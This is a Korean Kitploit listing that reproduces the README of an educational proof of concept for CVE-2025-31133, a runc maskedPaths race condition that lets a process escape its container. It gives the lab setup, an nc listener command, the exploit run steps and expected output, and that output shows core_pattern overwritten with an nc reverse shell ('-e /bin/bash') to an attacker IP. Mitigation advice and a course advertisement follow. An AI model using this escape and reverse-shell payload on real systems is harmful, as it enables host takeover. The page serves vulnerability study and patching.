Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Learn-about-cve-2025-31133-poc — CVE-2025-31133에 대한 교육용 개념 증명으로, maskedPaths 경쟁 조건을 통한 runc 컨테이너 탈출 도구입니다. 보안 연구자를 위한 실습 환경 설정, 익스플로잇 스크립트 및 완화 가이드를 포함합니다. | Kitploit
도구/GitHubGitHub/c-h4ck-0/learn-about-cve-2025-31133-poc
Container SecurityVulnerability AnalysisExploitationLearning & EducationContainer EscapeLabs & Practice
GitHubc-h4ck-0/learn-about-cve-2025-31133-poc

Learn-about-cve-2025-31133-poc

CVE-2025-31133에 대한 교육용 개념 증명으로, maskedPaths 경쟁 조건을 통한 runc 컨테이너 탈출 도구입니다. 보안 연구자를 위한 실습 환경 설정, 익스플로잇 스크립트 및 완화 가이드를 포함합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
234개월 전아직 검토되지 않음

CVE-2025-31133-PoC 학습하기

개요

CVE-2025-31133에 대한 개념 증명 데모 및 학습 환경입니다. 이는 runc의 보안 취약점으로, 경쟁 조건을 통해 maskedPaths 보호를 우회할 수 있습니다. maskedPaths는 컨테이너가 민감한 호스트 파일 시스템 경로에 접근하는 것을 방지하도록 설계되었습니다.

https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910

👉 이 저장소는 Black Hat 트레이닝에서 가르치는 정확한 연구 사고방식과 기술의 실제 예시입니다.

이것이 흥미롭다면, 이것은 빙산의 일각에 불과합니다.

공격적 컨테이너 보안: 경계를 허무는 마스터클래스

📅 Black Hat USA 2026 트레이닝 일정:

8월 1–2일

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-50910

8월 3–4일

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-509101770251750

취약점 세부 정보

  • CVE ID: CVE-2025-31133
  • 구성 요소: runc (컨테이너 런타임)
  • 공격 벡터: maskedPaths 처리의 경쟁 조건
  • 영향: 컨테이너 탈출

작동 원리

이 익스플로잇은 다음과 같은 경쟁 조건을 이용합니다:

  1. 컨테이너가 민감한 파일(예: /proc/sys/kernel/core_pattern)을 보호하기 위해 maskedPaths로 구성됩니다.
  2. 컨테이너 초기화 중에 다음 사이에서 경쟁 조건이 발생합니다:
    • 컨테이너 rootfs에서 디바이스 노드(/dev/null) 삭제
    • 해당 디바이스 노드 재생성
  3. 이 타이밍 윈도우로 인해 마스킹된 경로 보호를 우회할 수 있습니다.
  4. 공격자는 마스킹되어야 하는 보호된 파일에 쓸 수 있습니다.

⚠️ 면책 조항

이 저장소는 교육 목적으로만 제공됩니다.

  • 격리되고 통제된 환경에서만 사용하십시오.
  • 소유하지 않거나 테스트할 명시적 권한이 없는 시스템에 사용하지 마십시오.
  • 저자는 이 코드의 오용에 대해 책임을 지지 않습니다.
  • 이 익스플로잇은 시스템 불안정 또는 데이터 손실을 초래할 수 있습니다.

사전 요구 사항

  • Linux 시스템 (Ubuntu 권장)
  • Root/sudo 액세스
  • 인터넷 연결
  • 컨테이너 런타임 및 보안에 대한 기본 이해

설정

1. 이 저장소 복제 또는 다운로드

root@kitploit:~
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc

2. 랩 설정 스크립트 실행

lab-setup.sh 스크립트는 다음을 수행합니다:

  • 종속성 설치
  • 취약한 runc v1.2.0 설정
root@kitploit:~
chmod +x lab-setup.sh
./lab-setup.sh

3. 설정 확인

취약한 runc 버전이 설치되었는지 확인합니다:

root@kitploit:~
runc --version

1.2.0 또는 유사한 버전이 표시되어야 합니다.

익스플로잇 실행

기본 사용법

  1. 리버스 셸을 받기 위해 공격자 머신에서 리스너를 시작합니다:
root@kitploit:~
nc -lnvp <PORT>
  1. 익스플로잇 스크립트 실행:
root@kitploit:~
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
  1. 프롬프트가 표시되면 필요한 정보를 입력합니다:
    • 공격자 IP 주소
    • 공격자 포트 (리스너가 실행 중인 포트)

예상 출력

성공 시 다음이 표시되어야 합니다:

root@kitploit:~
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E

====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148:  7068 Segmentation fault      (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.

리버스 셸 연결이 리스너에 설정되어야 합니다.

완화 방법

이 취약점으로부터 보호하려면:

  1. runc를 패치된 버전(v1.2.1 이상)으로 업데이트하십시오.
  2. 컨테이너 런타임을 정기적으로 업데이트하십시오.
  3. 최소 권한 원칙을 사용하십시오 - 루트가 아닌 사용자 네임스페이스에서 컨테이너를 실행하십시오.

참고 자료

  • 메일링 아카이브
  • 취약점 PoC GitHub 저장소

참고 사항

  • 경쟁 조건의 특성상 익스플로잇이 성공하려면 여러 번 시도해야 할 수 있습니다.
  • 성공률은 시스템 부하와 타이밍에 따라 달라집니다.
  • 스크립트는 익스플로잇 성공 후 원래 core_pattern을 자동으로 복원합니다.
  • 정리는 트랩 핸들러를 통해 자동으로 처리됩니다.

라이선스

이 프로젝트는 교육 목적으로 제공됩니다. 책임감 있고 윤리적으로 사용하십시오.


기억하세요: 보안 연구 도구는 항상 책임감 있게, 소유하거나 테스트할 명시적 권한이 있는 환경에서만 사용하십시오.

도구 다운로드